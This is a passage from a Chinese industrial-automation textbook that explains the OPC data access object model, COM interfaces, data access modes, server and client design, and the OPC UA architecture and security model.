随着基于OPC标准的控制组件的推广和普及,不仅使控制系统的功能的增减和组件的置换更加简单,而且使过程数据的访问也变得容易。比如,符合OPC规范的过程控制程序可以直接和数据分析软件包或电子表格应用程序连接,从而为实现先进控制功能和管控一体化的实现创造基础。例如,在化工企业广泛采用集散控制系统,但在集散控制系统上开发一些先进控制算法或应用比较困难,因此,可以利用OPC技术,编写一个OPC客户程序来实现先进控制功能,该客户程序与DCS通过OPC接口实时交换数据。COM的编程比较困难,需要较多的计算机知识。对于OPC服务器开发者来说,对COM的理解和掌握是必不可少的。但是对于用户来说,利用VB(Visual Basic)或者VBA(VB Applet)开发OPC应用程序还是比较容易的。 6.3 OPC分层模型结构与对象接口 6.3.1 OPC分层模型结构 OPC数据访问提供从数据源读取和写入特定数据的手段。OPC数据访问对象是由如图6.5所示的分层结构构成的。即一个OPC服务器对象(OPCServer)具有一个作为子对象的OPC组集合对象(OPCGroups)。在这个OPC组集合对象里可以添加多个的OPC组对象(OPCGroup)。各个OPC组对象具有一个作为子对象的OPC项集合对象(OPCItems)。在这个OPC项集合对象里可以添加多个OPC项对象(OPCItem)。此外,作为选用功能,OPC服务器对象还可以包含一个OPC浏览器对象(OPCBrowser)。 OPC对象中的最上层的对象是OPC服务器。一个OPC服务器里可以设置一个以上的OPC组。OPC服务器经常对应于某种特定的控制设备。例如,某种DCS控制系统或者某种PLC控制装置。 OPC组是可以进行某种目的数据访问的多个OPC项的集合,例如某监视画面里所有需要更新的变量,或者某个设备监控相关的所有变量等。正因为有了OPC组,OPC应用程序就可以以同时需要的数据为一批进行数据访问,也可以以OPC组为单位启动或停止数据访问。此外OPC组还提供组内任何OPC项的数值变化时向OPC应用程序通知的数据变化事件,如表6.2所示。 图6.5 OPC分层模型 表6.2 OPC数据访问对象模型 OPC组有两种类型:公共组(Public)和局部组(Local or Private)。公共组可以为多个客户程序共享,而局部组只为某一个客户程序所有。在每个组里,客户程序可以定义多个OPC项。 OPC对象里最基本的对象是OPC项。OPC项是OPC服务器可认识的数据定义,通常相当于下位机的某个变量标签,并和数据源(如SCADA系统中的下位机的I/O)相连接。OPC项具有多个属性,但是其中最重要的属性是OPC项标识符。OPC项标识符是在控制系统中可识别OPC项的字符串。 6.3.2 OPC对象接口 1. OPC服务器接口 OPC服务器对象的COM接口模型如图6.6所示,其中带有[]的接口为任选接口。图6.6中的接口介绍如下。 (1)IUnknown接口:COM对象必须实现的接口,主要负责对象的接口查询和生存期管理,包括QueryIntertface()、AddRef()和Release()函数。客户程序可以通过QueryInterfac()查询需要访问的接口。因此,客户程序只要得到对象的任何一个接口,就可以访问对象的所有接口。 (2)IOPCCommon接口:OPC规范如DataAccess,Historical DataAccess,Alarms andEvents等的OPC Server对象的公共接口,通过该接口的函数,可以设置或查询组件应用程序的位置标识Local ID,从而实现客户应用程序与服务器的有效会话,且客户程序间不受干扰。 (3)IOPCServcr接口:是Server对象的主要接口,主要完成Group对象的添加、删除、获取Server对象的状态、创建组对象枚举器等。 (4)IConnectionPointContainer接口:是COM标准接口,支持可连接点对象。包含两个成员函数EnumConnectionPoints()和FindConnectionPoint()。EnumConnectionPoint()函数返回连接点枚举器,客户可以利用此枚举器访问COM对象的所有连接点。FindConnectionPoint()函数根据给定接口引用标识IID,返回相应接口的连接点。当OPC服务器关闭时需要通知所有的客户程序释放OPC组对象和其中的OPC组员,此时可利用该接口调用客户程序方的IOPCShutdown接口实现服务器的正常关闭。 (5)IOPCServerPublicGroups、IPersistFile和IOPCBrowseServerAddressSpace为可选接口,OPC服务器提供商可根据需要选择是否需要实现。其中IOPCServerPublicGroups接口用于对公共组进行管理;IPersistFile接口允许用户装载和保存服务器的设置,这些设置包括服务器通信的波特率、现场设备的地址和名称等。这样用户就可以知道服务器启动和配置的改变而不需要启动其他的程序。IOPCBrowseServerAddressSpace主要供客户程序来查看服务器中有用项的信息。 图6.6 标准OPC服务器对象 2. OPC组对象接口 OPC组对象的COM接口模型如图6.7所示,其中带有[]的接口为任选接口。图6.7中的接口介绍如下: (1)IOPCItemMgt接口及其成员函数的功能是允许OPC客户程序添加和删除项对象并可控制项对象的行为。 (2)IOPCGroupStateMgt接口及其成员函数允许客户程序管理组对象的所有状态,最基本的功能是改变组对象的更新速率和活动状态。 图6.7 标准OPC组对象 (3)IOPCPublicGroupStateMgt为可选接口,用于将私有组对象转换成公共组对象,因为当客户创建一个组对象时,被初始化为私有组对象。 (4)lOPCSyncIO接口允许客户对服务器执行同步读/写操作,操作将一直运行到完成才返回。 (5)IOPCAsyncIO2接口允许客户对服务器执行异步读/写操作,操作被“排队等候”,函数立即返回。每项操作被看作一个“事务”,并被分配一个事务ID,当操作完成时,客户IOPCDataCallback接口的回调将执行。回调中的信息指出了事务ID和操作结果。 (6)IConnectionPointContainer接口:组对象必须实现此接口,与服务器对象的此接口的唯一区别是管理的出接口不一样,组对象管理的出接口是IOPCDataCallback接口,可使客户与服务器连接并进行最有效的数据传送。 (7)IOPCAsyncIO(old)接口是数据存取规范1.0必须实现的接口之一,按照程序兼容规则,符合规范2.0的服务器也应该实现规范1.0的必选接口。 (8)IDataObject(old)接口是OPC规范1.0需要服务器实现的接口,这允许使用OPC数据流格式创建客户与组对象之间的Advise接口,用于进行高效的数据交换。 3. OPC项 OPC项代表与服务器里数据源的连接。从定制接口(Custom Interface)角度来看,一个OPC项不能被OPC客户程序作为一个对象来进行操作,因此,在OPC项中没有定义外部接口。所有对OPC项的操作都是利用OPC项的包容器(OPC组)或OPC项的定义来进行的。每个OPC项包含值(Value)、品质(Quality)和时间戳(Time Stamp)。值(Value)的类型是VARIANT,品质的类型是SHORT。值表示实际的数值,品质则标识数值是否有效,时间戳则反映从设备读取数据的时间或者服务器刷新其数据存储区的时间。 应当注意的是项不是数据源,而只是与数据源的连接。OPC项应该被看成是数据地址的标识,而不是数据的物理源。OPC规范中定义两种数据源,即内存数据(cache data)和设备数据(device data)。每个OPC服务器都有数据存储区,存放着值、品质、时问戳以及相关设备信息,这些数据称为内存数据。而现场设备中的数据则是设备数据。OPC服务器总是按照一定的刷新频率通过相应驱动程序访问各个硬件设备,将现场数据送入数据存储区。这样对OPC客户而言,可以直接读/写服务器存储区中的内存数据。这些数据是服务器最近一次从现场设备获得的数据,但并不能代表现场设备中的实时数据。为了得到最新的数据,OPC客户可以将数据源指定为设备数据,这样服务器将立刻访问现场设备并将现场数据反馈给OPC客户。由于需要访问物理设备,所以OPC客户读取设备数据时速度较慢,往往用于某些特定的重要操作。 6.4 OPC接口与数据访问方法 6.4.1 OPC接口 OPC规范是一种硬件和软件的接口标准。OPC技术规范包括两套接口:定制接口(Custom Interface)和自动化接口(Automation Interface)。若客户的应用程序使用Microsoft VB之类的“脚本语言”(Scripting Languages)编写,则选用自动化接口。OPC定制接口则用于以C++来创建客户应用程序。当然,编程选用何种接口还取决于OPC服务器所能提供的接口类型,并非所有的OPC服务器都支持这两种接口。使用OPC定制接口可以达到最佳的性能,而OPC自动化接口则较简单。OPC服务器具体确定了可以存取的设备和数据、数据单元的命名方式以及对具体设备存取数据的细节,并通过OPC标准接口开放给外部应用程序。各个OPC客户程序通过OPC标准接口对各OPC服务器管理的设备进行操作,而无需关心服务器实现的细节。数据存取服务器一般包括服务器、组和数据项3种对象。OPC服务器负责维护服务器的信息,并是组对象的容器。组对象维护自己的信息并提供容纳和组织OPC数据单元的架构。 自动化接口定义了以下3层接口,依次呈包含关系。 (1)OPC Server:OPC启动服务器,获得其他对象和服务的起始类,并用于返回OPC Group类对象。 (2)OPC Group:存储由若干OPC Item组成的Group信息,并用于返回OPC Item类对象。 (3)OPC Item:存储具体Item 的定义、数据值、状态值等信息。 由于OPC规范基于OLE/COM技术,同时OLE/COM的扩展远程OLE自动化与DCOM技术支持TCP/IP等多种网络协议,因此可以将OPC客户、服务器在物理上分开,分布于网络不同节点上。 OPC规范可以应用在许多应用程序中,如它们可以应用于从SCADA 或者DCS系统的物理设备中获取原始数据的最低层,它们同样可以应用于从SCADA 或者DCS系统中获取数据到应用程序中。图6.8所示的OPC的客户/服务器关系图描述了OPC在自动化系统中的应用。 图6.8 OPC的客户/服务器关系图 6.4.2 OPC数据访问方法 首先,OPC客户连接到OPC服务器上,并且建立OPC Group和OPC Item,这是OPC数据访问的基础,如果没有这个机制,数据访问的其他机能不可能实现;其次,客户通过其建立的Group和Item进行访问实现对过程数据的访问;最后,当服务器响应客户的过程数据访问请求并且处理完毕时通知客户。以上3方面的机制是OPC数据访问服务器必须要实现的。客户的过程数据访问包括过程数据的读取、更新、订阅、写入等,过程数据的读/写还分同步读/写和异步读/写。建立OPC连接后,客户应用程序一般可以通过以下3种方式从OPC服务器读取数据。 1.使用IOPCSyncIO接口同步读/写 如图6.9所示的同步访问,OPC服务器把按照OPC应用程序的要求得到的数据访问结果作为方法的参数返回给OPC应用程序,OPC应用程序在结果被返回之前必须一直处于等待状态。 图6.9 同步数据访问 2.使用IOPCASyncIO和 IOPCASyncIO2接口异步读/写 如图6.10所示的异步访问,OPC服务器接到OPC应用程序的要求后,几乎立即将方法返回。OPC应用程序随后可以进行其他处理。当OPC服务器完成数据访问时,触发OPC应用程序的异步访问完成事件,将数据访问结果传送给OPC应用程序。OPC应用程序在事件处理程序中接受从OPC服务器传送来的数据。 图6.10 异步数据访问 3.使用IOPCCallback接口订阅式访问 除了上述的同步和异步数据访问以外,还有如图6.11所示的订阅式访问。订阅式数据采集方式实际上也属于异步读取方式的一种。这种访问方式并不需要OPC应用程序向OPC服务器要求,就可以自动接到从OPC服务器送来的变化通知的订阅(Subscription)方式数据采集。服务器按一定的更新周期(UpdateRate)更新OPC服务器的数据缓冲器的数值时,如果发现数值有变化时,就会以数据变化事件(DataChange)通知OPC应用程序。如果OPC服务器支持不敏感带(DeadBand),而且OPC项的数据类型是模拟量的情况,只有当前值与前次值的差的绝对值超过一定限度时,才更新缓冲器数据并通知OPC应用程序。通过设置不敏感带可以忽略模拟值的微小变化,从而大大减轻OPC服务器和OPC应用程序的负荷。 图6.11 订阅式数据访问 订阅式数据采集方式基于“客户/服务器/硬件设备”模型,在服务器中的内部建立预定数据的动态缓存,并且当数据变化时对动态缓存给予刷新,并向订阅了这些数据的客户端发送。这种处理方式对于模拟量多的SCADA系统十分有用。 上述的OPC数据访问的功能并非必须全部实现,其中有一部分功能是选用的。这些选用功能是否被支持将随供应厂商的具体的服务器类型而定。OPC数据访问的功能可总结成如表6.3所示。OPC同步访问和异步访问的比较如表6.4所示。OPC应用程序的开发者可按照应用程序的用途和目的选择合适的数据访问方法。 表6.3 OPC数据访问的功能 表6.4 OPC同步和异步数据访问的特征 6.5 其他OPC规范 6.5.1 OPC报警与事件 OPC报警与事件(Alarm and Event)接口规范提供了一种机制,通过这种机制,当I/ O设备中有指定的事件或报警条件发生时,OPC客户程序可以得到通知。通过这个接口,OPC客户程序还可以知道OPC服务器支持哪些事件和报警条件,并能得到其当前状态。这里使用了过程控制中常用的报警和事件的概念,在不严格的场合,报警和事件也可以互换,两者意义上的差别不是非常明显。 在OPC中,一个报警是一种非正常情况,因此是一种特殊的情况。一个情况是OPC事件服务器(Event Server)或其所包含的对象中命名了的一个状态,而这个状态一般来说是对OPC客户程序有意义的。例如,标签FC101可以有以下几种相关的情况:上限报警、上上限报警、正常、下限报警、下下限报警。 另一方面,一个事件是对OPC服务器、其所表示的I/O设备或OPC客户重要的某种可感觉到的变化。一个事件可以是和某种情况相关的,也可能与任何情况无关。例如,数据从正常变化到上限报警或从报警变化到正常状态,这是和某种情况有关的事件。而操作人员的动作(如对系统配置的更改)、系统故障则是与情况无关联的事件。 OPC事件服务器接口类IOPCEventServer通过其方法使得OPC客户程序能够完成以下功能:决定OPC服务器支持的事件的类型;对某些特定的事件进行登记,以便当这些事件发生时,OPC客户程序能得到通知,也可以采用过滤器定义这些事件的一个子集;对OPC服务器实现的情况进行存取或处理。 除了接口类IOPCEventServer外,OPC事件服务器还支持其他的接口,能够对服务器中实现的情况进行浏览,或者对公共的组进行管理。 6.5.2 OPC历史数据存取 历史数据引擎可以向感兴趣的用户或客户程序提供关于原始数据的额外信息。目前大部分历史数据系统采用自己专用的接口分发数据,这种方式不能提供即插即用的功能,从而限制了其应用范围和功能。 为了将历史数据和各种不同的应用系统进行集成,可以将历史信息认为是某种数据类型的数据。目前的OPC规范支持以下几种历史数据服务器。 (1)简单趋势数据服务器:这种服务器只是提供原始数据和简单存储功能,数据一般以OPC数据存取服务器提供的类型存储,即取[数值,品质]元组的形式。 (2)复合数据压缩和分析服务器:这种服务器可以提供数据压缩功能,还可以提供数据汇总和数据分析功能,如取平均值、最大值、最小值等。支持数据刷新及刷新历史记录,此外,保存历史数据的同时还可以记录对数据的注释信息。 6.5.3 OPC批量服务器 OPC批量服务器主要用于访问批量控制过程的各类数据源。用于批量控制过程的OPC服务器可以是单纯的OPC批量服务器,也可以是位于现有专用批量过程数据源之上的一套OPC接口。OPC批量服务器的数据源可以是普通的OPC数据访问服务器,也可以是制造商特定的批量过程应用程序。访问OPC批量服务器的客户应用程序可以通过OPC批量服务器提供的OPC接口访问批量过程数据,也可以借助OPC批量服务器访问OPC数据访问服务器,还可以直接访问OPC数据访问服务器。OPC批量服务器不直接与现场设备通信,一般由OPC数据访问服务器或现有专用批量数据的物理接口访问现场设备的I/O。 6.6 OPC服务器与客户程序设计 6.6.1 OPC服务器设计 1. 总体结构 OPC数据服务器可按图6.12的系统结构设计。它主要由服务器对象与接口、数据存储区、硬件驱动程序和服务器界面与设置等部分组成。各个部分功能相对独立又相互协作,形成一个统一的整体。OPC对象部分是OPC服务器程序与客户程序进行交互的部分。OPC对象包括服务器对象、组对象、项对象,其中前两个对象是真正的COM对象,能够将各自的接口暴露给客户程序。OPC服务器对象和组对象之间是聚合关系,即OPC服务器对象创建OPC组后,将组对象的指针传递给客户,由客户直接操纵组对象。而组对象只是简单地包容OPC项对象,客户程序通过组对象管理OPC项。在OPC服务器中,OPC对象部分需要与数据存储区和硬件驱动程序相联系,以便获取数据区中的数据或直接访问硬件设备。数据存储区中存放着OPC服务器中定义的数据项。数据项包括值、品质、时间戳三个基本属性以及与硬件相关的属性,例如设备号、板卡号、通道号等。数据项的基本属性与OPC规范中定义的OPC项属性一致。客户程序通过组对象添加OPC项时,将OPC项与数据项关联起来,读取数据时返回其基本属性。数据存储区是服务器的中心部分,需要动态地管理和维护数据项,并与其他部分进行数据交互。服务器界面与设置部分为用户提供了友善的界面,使用户可以管理数据存储区中的数据项并设置其属性。同时该部分负责对硬件的初始设置以及在程序运行期间对硬件的监控和诊断,保证与现场设备的正常通信。该部分还负责保存这些设置,在OPC服务器程序每次运行时能够自动完成设置。硬件驱动程序是OPC服务器对硬件进行设置和读/写操作的部分,不同的硬件均需要开发相应的接口函数,并将底层细节封装起来以供服务器中其他部分调用。 图6.12 OPC服务器程序总体结构 2. 设计步骤 由于OPC技术是以微软的COM技术为基础,同时需要直接与底层硬件打交道,所以采用VC实现比较灵活方便。下面给出实现OPC数据服务器的主要步骤: (1)定义OPC数据服务器的名称(ProgID)和类标识(CLSID),实现COM库的初始化功能和OPC数据服务器类对象的接口功能。 (2)OPC对象部分的设计是关键步骤。首先通过继承IUnknown类派生出OPCServer、OPCGroup和OPCItem三个类,重载IUnknown类中的接口查询和引用计数函数。这三个类的实例分别对应OPC服务器对象、组对象和项对象。 OPC接口采用了一种称为“Tear-of”接口的COM高级技术,即创建一个对象时只实例化IUnknown接口和经常使用的接口,其他不常用的接口在客户程序需要使用时才创建,这样能够改进服务器的性能。OPC规范为每个接口都给出了详细的接口定义,OPC基金会的网站上也提供了相应的头文件。需要将这些头文件添加到工程当中,然后通过继承这些接口派生出新的接口类,实现每个接口的成员函数。在OPCServer和OPCGroup类中增加指向相应接口类的指针成员变量。接着修改接口查询函数,当客户程序查询某一接口时实例化接口类,并返回接口指针变量。客户程序再通过该接口指针进一步调用接口成员函数。最后,可根据实际情况定义并实现各个继承类的特殊属性和方法,例如增加读取存储区或硬件设备数据的函数等。设计者还可以在服务器对象或组对象中增加自己定义的接口,实现某些特定的功能。 (3)数据存储区的设计可利用C++标准模板库(STL)中的包容器,通过包容器管理OPC服务器中的数据项。由于OPC服务器既要对底层硬件进行读/写操作,又要通过OPC接口与客户程序进行交互,所以对数据存储区的操作需要采用多线程模型以保证数据存取的效率。为避免不同线程同时对数据区中的数据进行操作,还需考虑对临界区的互斥控制。 (4)为了方便用户操作,可以设计类似Windows中资源管理器的用户界面,将各数据项用树形结构表示。然后设计数据项和硬件的设置界面,并与数据存储区和硬件接口联系起来,实现相应的组态功能。在OPC服务器程序关闭时需要将数据项的属性以及硬件设置参数作为组态文件保存起来;而在程序运行时能自动调入组态文件,完成初始设置。 (5)根据硬件的种类和特性自行开发驱动程序或者调用硬件厂商提供的I/O DLL,实现对现场设备进行设置以及数据存取的功能。 (6)将以上几个部分结合起来,并用对OPC服务器程序进行测试和修改,完成最后的设计。在测试时也需要安装注册OPC基金会提供OPC标准组件,如OPCPROXY.DLL等,然后利用可靠的OPC客户程序进行测试。 6.6.2 OPC客户程序设计 这里的客户程序设计主要是指客户程序中OPC接口部分的设计。客户程序本身可以完成很多复杂的数据处理、显示和控制等功能,但需要通过OPC接口部分访问OPC服务器,对现场数据进行存取。 在开发OPC客户程序前,要选择合适的开发环境,并对开发环境进行配置,例如在Windows XP操作系统下用Visual C++开发客户程序前,要将OPC基金会提供的SDK包中的几个重要文件加载到应用程序中,包括opccomn.h(OPC公共接口定义头文件)、opccomn_i.c(OPC公共接口定义)、opcda.h(OPCDA规范2.0头文件)、opcda_i.c(OPC数据存取接口GUID)、opcda_cats.c(OPC数据存取组件分类文件),这些主要给出了接口的定义等。opcaaum和OPCEnum.exe也是COM组件,用于枚举本地机以及远程机上所有的OPC服务器。 OPC客户程序开发中首先要实现浏览OPC服务器的功能。客户程序需要创建OPC基金会提供的OPC服务器浏览器对象(OPCServerList),再通过该对象的IOPCServerList接口获得OPC服务器名称的列表。在此基础上,再创建OPC组对象、OPC项对象,确定数据访问接口方式并进行编程。 另外客户程序中OPC接口部分如何与其他功能模块进行数据交换也是需要根据实际情况仔细考虑的。ServerList客户程序可以通过枚举注册表中包含OPC子键的程序名来浏览符合OPC数据存取规范1.0/2.0的服务器,但效率较低。OPC客户程序需要实现与OPC服务器进行交换的功能包括创建服务器对象、组对象,读/写数据等。设计时需要注意COM对象的引用计数问题、内存管理问题和处理错误返回代码问题。 由于一个OPC客户程序可能与多个OPC服务器相连,因此设计时也最好采用多线程,同时与多个OPC服务器程序进行交换以保证较高的通信效率。另外客户程序中OPC接口部分如何与其他功能模块进行数据交换也是需要根据实际情况仔细考虑的。 6.6.3 OPC软件工具包 由于开发OPC程序需要熟悉OPC规范和COM技术,而且符合同一OPC规范的服务器程序只是硬件接口部分不同,其余部分类似,因此许多公司研制开发了OPC服务器的工具包软件。这些工具包将OPC对象和接口的实现封装起来,用户只需要开发与硬件相关的部分,并对界面进行简单设计。这些工具包还往往提供了与常用硬件连接的驱动程序,例如与RS-232设备或以太网卡连接的I/O DLL。工具包的使用能提高OPC服务器程序的开发速度和质量。设计者不需过多了解OPC对象的实现细节,但是也必须对工具包本身比较熟悉。另外由于工具包中某些实现部分是通过DLL的形式封装起来的,当用户需要增加某些特定功能时会受到一些限制。 6.6.4 互操作性测试 最初制定OPC规范的目的就是实现工控软件之间的无缝连接,提高控制系统的互操作性和适应性,因此OPC服务器和客户程序都需要进行互操作性测试。目前OPC基金会尚未制定权威的测试程序,也没有提供OPC软件产品的互操作性认证工作。但OPC基金会每年都在美国和欧洲举办两次互操作性测试研讨会,对来自OPC成员公司的服务器和客户程序进行测试。一些自动化厂商提供了测试OPC互操作性的工具。可以在相关网站上下载这些工具,并用它们对自己设计的OPC程序进行测试。另外,在OPC基金会的网站上也有关于互操作性的网页,对加入OPC基金会互操作研讨会的OPC产品,用户可以查找到能够与之连接的OPC服务器或客户程序。 6.7 OPC UA规范 6.7.1 OPC UA规范提出的背景 1.传统OPC规范的不足 OPC通信标准的核心是互通性(Interoperability)和标准化(Standardization)问题。传统的OPC技术在控制级别很好地解决了监控软件与硬件设备的互通性问题,并且在一定程度上支持了软件之间的实时数据交换。然而,传统的OPC规范在面向更大规模的企业级应用软件互联对数据通信的要求上还存在不足,具体表现在以下几个方面。 1)微软COM/DCOM技术的局限性 由于要实现DCOM功能,需要对计算机系统进行一定的设置,从而满足分布式控制系统的应用需求,但这种设置会比较烦琐,而且会带来较为严重的安全隐患。此外,由于从2002年开始微软发布了新的.NET框架并且宣布停止COM技术的研发,这影响了传统OPC规范的应用前景。 2)缺乏统一的数据模型 例如,如果用户需要获取一个压力的当前值、一个压力超过限定值的事件和一个压力的历史平均值,那么他必须发送3个请求,访问传统的数据存取服务器、报警与事件服务器和历史数据访问服务器这3个OPC服务器。这不仅导致用户使用的不便,而且还影响了访问效率。 3)缺少跨平台通用性 由于COM 技术对Microsoft 平台的依赖性,其平台可移植性较差,使得基于COM/DCOM 的OPC 接口很难被应用到其他系统的平台上。 4)较难与Internet 应用程序集成 由于OPC 是基于二进制数据传输,这一点令其很难穿过网络防火墙,因此基于COM/DCOM 的OPC 接口无法与Internet应用程序进行正常的交互。虽然基于Web Service技术,OPC XML 技术已经较好地实现了数据在互联网上的通信,但其单位时间内所读取的数据项个数要比基于COM/DCOM方式少两个数量级左右,导致这种方式很难被推广。 OPC统一架构(Unified Architecture,UA)规范是在传统OPC技术取得巨大成功之后的又一个突破。它以统一的架构与模式,既可以实现设备底层的数据采集、设备互操作等的横向信息集成,又可以实现设备到SCADA、SCADA到MES、设备与云端的垂直信息集成,让数据采集、信息模型化,以及工厂底层与企业层面之间的通信更加安全、可靠。图6.13所示为其目标应用结构。 图6.13 OPC UA目标应用 2.OPC UA的改进 相对于传统OPC规范,OPC UA的改进主要体现在以下几个方面。 1)OPC UA的标准化通信机制 OPC UA使用一种优化的基于TCP的二进制协议完成数据交换,还支持Web服务和HTTP,允许在防火墙中打开一个端口,而集成的安保机制确保了通过因特网也能安全通信,即OPC UA规范实现了通过因特网和通过防火墙的标准化与安全通信。 2)防止非授权的数据访问 OPC UA技术使用一种成熟安保理念,防止非授权访问和过程数据损坏,以及由于误操作带来的错误。OPC UA安保理念基于World Wide Web 标准,通过用户鉴权、签名和加密传输等项目来实现。 3)数据安全性和可靠性 OPC UA使用可靠的通信机制、可配置的超时、自动错误检查和自动恢复等机制,定义了一种可靠、坚固的架构。对OPC UA客户机与服务器之间的物理连接可以进行监视,随时发现通信中的问题。OPC UA具有冗余特性,可以在服务器和客户机应用中实施,防止数据的丢失,实现高可用性系统。 4)平台独立和可伸缩性 OPC UA基于消息传递,消息采用WSDL定义,而非二进制数据传输,从而实现了平台无关性。由于使用了基于面向服务的技术,OPC UA具有平台独立的属性,可以实施全新的、节省成本的自动化理念。嵌入式现场设备、过程控制系统(DCS)、可编程逻辑控制器(PLC)、网关或者操作员面板(HMI)可以依靠OPC UA服务器直接连到各种类型操作系统,例如:嵌入的Windows、Linux、VxWorks、QNX、RTOS等。当然,OPC UA组件也可以在UNIX操作系统中使用,诸如Solaris、HPUX、AIX、Linux等,可以是企业资源计划(ERP)系统,可以是生产计划(MES)和监控软件(SCADA),还可以是电子商务应用。OPC UA 的组件功能是可伸缩的,小到一个嵌入式设备的应用,大到公司级别大型计算机的数据管理系统。 5)全新的集成API(应用程序接口) OPC UA 定义了全新的集成API,是一个服务集,可以在同一个OPC 服务器下更方便地访问实时数据、历史数据、报警信息等,避免了通过不同OPC服务器各自的API 访问不同的数据,同时也简化了服务器开发时API 重叠的问题。与传统OPC规范相比,使用OPC UA,仅用一个组件就非常容易地完成对一个压力的当前值、一个压力超过限定值的事件和一个压力的历史平均值的访问。 6)OPC UA服务器便于部署 OPC UA可以方便地从OPC DA服务器和客户端升级到OPC UA服务器和客户端,这样大大降低了OPC UA 推广和部署的难度。 6.7.2 OPC UA规范内容 1. OPC UA规范概述 2012年7月发布的OPC UA规范1.02版包括13个部分。其中第1到第7部分属于核心规范。第8到第11部分属于数据存取规范,最后两个部分属于工具(Utility)部分。核心规范部分包括OPC UA Data Access、OPC UA Alarms and Conditions、OPC UA Programs以及OPC UA Historical Access 规范;存取规范部分包括OPC UA Security Model、OPC UA Address Space Model、OPC UA Services、OPC UA Information Model、OPC UA Service Mappings和OPC UA Profiles 等。 2. OPC UA 系统结构 和现行OPC 一样,OPC UA系统结构包括OPC UA服务器和客户端两个部分, 每个系统允许多个服务器和客户端相互作用。 1)OPC UA客户端 OPC UA 客户端的体系结构包括客户终端的客户端/服务器交互。它包括OPC UA 客户端应用程序、OPC UA 通信栈、OPC UA客户端API,如图6.14所示。它使用OPC UA客户端API与OPC UA 服务器端发送和接收OPC UA 服务请求和响应。 图6.14 OPC UA客户端架构 2)OPC UA服务器 OPC UA服务器代表客户端/服务器相互作用的服务器端点。它主要包括OPC UA 服务器应用程序、真实对象、OPC UA地址空间、发布/订阅实体、OPC UA 服务器接口API、OPC UA通信栈,如图6.15所示。它使用OPC UA 服务器API 从OPC UA客户端来传送和接收消息。 OPC UA客户端与服务器主要的交互形式是:通过客户端发送服务请求,经底层通信实体发送给OPC UA通信栈,并通过服务器接口调用请求/响应服务,在地址空间的节点上执行指定任务之后,返回一个响应;客户端发送发布请求,经底层通信实体发送给OPC UA通信栈,并通过服务器接口发送给订阅,当订阅指定的监视项探测到数据变化或者事件/警报发生时,监视项生成一个通知发送给订阅,并由订阅发送给客户端。 图6.15 OPC UA服务器架构 3)OPC UA服务器间的互访问 新的OPC UA技术支持服务器间的相互访问,也就是一台服务器作为另一个服务器的客户端,如图6.16所示。通过服务器间的交互可以实现: (1)基于点对点的服务器信息交换。 (2)链接服务器实现分层体系,提供以下功能: · 对低层服务器的数据聚集。 · 构造更高层次的数据给客户端。 · 用户提供一个集成的接口以访问多个底层服务器。 图6.16 服务器间的交互作用 3. OPC UA的模型和服务 OPC UA提供一致的、集成的地址空间和服务模型。它允许一个单独的OPC UA服务器来集成数据、警报、事件及历史数据到它的地址空间, 用一个集成的服务集提供对它们的存取。 1)OPC UA对象模型 现有OPC API 定义的对象是相互分离的,OPC UA 通过其对象模型实现了对各个对象服务的集成。OPC UA的对象模型集成了对象的变量、方法、事件及其相关的服务,如图6.17所示。 图6.17 OPC UA对象模型 变量表示对象的数据属性,它可以是简单值或构造值。变量有值特性、质量特性和时间戳,值特性表示变量的值,质量特性表示生成的变量值的可信度,时间戳特性表示变量值的生成时间。 方法是被客户调用执行的操作,它分为状态的和无状态的。无状态是指方法一旦被调用,必须执行到结束,而状态指方法在调用后可以暂停、重新执行或者中止。 事件表示发生了系统认为的重要事情,而其中表现异常情况的事件被称为报警。通过对象模型实现了数据、报警、事件和历史数据集成到一个单独的OPC UA服务器中,客户端只需一次调用,即可获得数据、警报和事件应用,不需要使用不同的API 来调用。 2)集成地址空间模型 在现有OPC 规范中,各个规范都有独立的地址空间与服务,因此,在处理复杂问题时通常要使用不同的地址空间,降低了程序运行效率。为了解决这个问题,OPC UA 提出了集成地址空间的概念,即将各个规范的地址空间集成在一个平台上,这样可以使不同规范在同一地址空间中调用服务。 为了提高客户端与服务器的互操作性,OPC UA地址空间的节点都是以层次结构进行组织的。尽管地址空间里的节点通过分层通常容易进入,但它们可能都互相引用,把地址空间组织成一个相互联系的网状结构。 为了简化客户访问地址空间,OPC UA 服务器创建了一个视点(view)。视点就是地址空间的一个子集,默认值就是整个地址空间。视点就是简化了地址空间的层次结构,其将地址空间分成若干块,其实视点与地址空间一样,也是被组织成为一个层次结构,并包含节点间的引用。视点对客户可视,客户通过浏览节点确定其结构。服务器可以在地址空间里定义它们自己的视点,或者视点可以通过客户调用OPC UA 服务来创建。 此外,OPC UA 之所以能够支持信息模型,正是通过地址空间的以下5个方面来实现的: (1)节点引用使得地址空间的对象能够相互联系。 (2)对象类型定义的节点为真实对象提供了语义信息。 (3)对象类型节点的层次结构支持子类的类型定义。 (4)数据类型定义的节点实现了对工业特定数据类型的使用。 (5)OPC UA配套标准允许工业组织定义如何在OPC服务器地址空间表示其特定信息模型。 3)OPC UA集成服务 OPC UA把客户机和服务器之间的接口定义为一组服务。这些服务被组织到称为服务集的逻辑组中。OPC UA服务器对客户机提供两个功能,它们允许客户机向服务器发出请求并从服务器接收响应,也允许客户机向服务器发送通知。服务器使用通知来报告事件,比如警报、数据值变化、事件和程序的执行结果。 服务集的采用解决了现有OPC规范在应用时服务重叠问题。它包括安全信息服务集、会话服务集、节点管理服务集、视图服务集、属性服务集、方法服务集、监视服务集、订阅服务集、查询服务集等。 4)OPC UA安全模型 由于企业综合自动化及两化融合的需要,企业的网络系统已实现互联,管理网络与Internet也实现了联通,企业管理人员甚至可以通过Internet掌握工厂的实时运营状态。因此,OPC UA服务器或客户端必须要采用一定的安全策略保证系统的安全。特别是在工控信息安全事件不断出现的背景下,如何确保数据传输的安全性已经成为构建数据网络要重点考虑的问题。 现有OPC技术的安全性单纯依靠COM本身的安全机制来保证,但是基于COM的OPC技术不能通过Internet进行安全可靠的数据传输。而OPC UA采用了会话建立、审核、传输安全等措施保证控制系统的网络安全。二者比较结果如表6.5所示。 表6.5 OPC DA规范与OPC UA规范比较 OPC UA安全模型包括客户端和服务器端的认证、用户认证、数据保密性等操作。考虑到在互联网上进行数据传输的安全性问题,OPC UA服务器或客户端必须要采用一定的安全策略保证数据在互联网环境下系统的安全。OPC UA采用了以下机制来保证数据采集和传输的可靠性: (1)OPC UA定义了一个Getstatus服务,客户端可以周期性地知道服务器的状态,同时定义了与状态相关的一系列诊断变量。通过这些诊断变量就可以知道服务器各个方面是否正常,此外允许客户端程序订阅服务器状态的变化。 